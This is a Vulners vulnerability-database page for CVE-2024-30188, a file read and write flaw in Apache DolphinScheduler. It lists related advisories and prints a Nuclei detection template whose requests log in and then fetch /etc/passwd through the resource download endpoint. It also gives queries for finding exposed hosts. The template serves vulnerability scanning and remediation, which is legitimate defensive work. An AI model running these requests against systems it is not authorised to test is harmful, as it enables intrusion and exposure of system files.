| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Apache DolphinScheduler Input Validation Error Vulnerability (NVD-C-2024-618180) | 14 Aug 202400:00 | – | cnvd | |
| CVE-2024-30188 | 9 Aug 202414:23 | – | cve | |
| CVE-2024-30188 Apache DolphinScheduler: Resource File Read And Write Vulnerability | 9 Aug 202414:23 | – | cvelist | |
| Apache DolphinScheduler: Resource File Read And Write Vulnerability | 12 Aug 202415:30 | – | github | |
| CVE-2024-30188 | 12 Aug 202413:38 | – | nvd | |
| GHSA-4VV4-CRW4-8PCW Apache DolphinScheduler: Resource File Read And Write Vulnerability | 12 Aug 202415:30 | – | osv | |
| PT-2024-23239 · Apache · Apache Dolphinscheduler | 28 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-30188 | 23 May 202508:01 | – | redhatcve | |
| Improper Input Validation | 12 Aug 202415:30 | – | snyk | |
| Improper Input Validation | 12 Aug 202415:30 | – | snyk |
id: CVE-2024-30188
info:
name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
impact: |
Attackers can read and write arbitrary resource files, potentially compromising system integrity and confidentiality.
remediation: |
Update Apache DolphinScheduler to a version that patches the resource file access vulnerability.
reference:
- https://github.com/advisories/GHSA-4vv4-crw4-8pcw
- https://github.com/Mr-xn/Penetration_Testing_POC
- https://nvd.nist.gov/vuln/detail/CVE-2024-30188
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2024-30188
epss-score: 0.88514
epss-percentile: 0.99519
cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: apache
product: dolphinscheduler
shodan-query: http.title:"dolphinscheduler"
fofa-query: title="dolphinscheduler"
google-query: intitle:"dolphinscheduler"
tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |-
POST /dolphinscheduler/login HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
userName={{username}}&userPassword={{password}}&ssoLoginUrl=
extractors:
- type: json
name: sessionId
part: body
json:
- ".data.sessionId"
internal: true
- raw:
- |
GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
sessionId: {{sessionId}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: regex
part: content_type
regex:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100b0e8ddbbe9c48b30d74108ae27a09774d06a77453332d252c102e3baf0a6a839022100e08d8235809488655078a42f949be82cca94e4e2496d03ec9153641e4d193cdd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation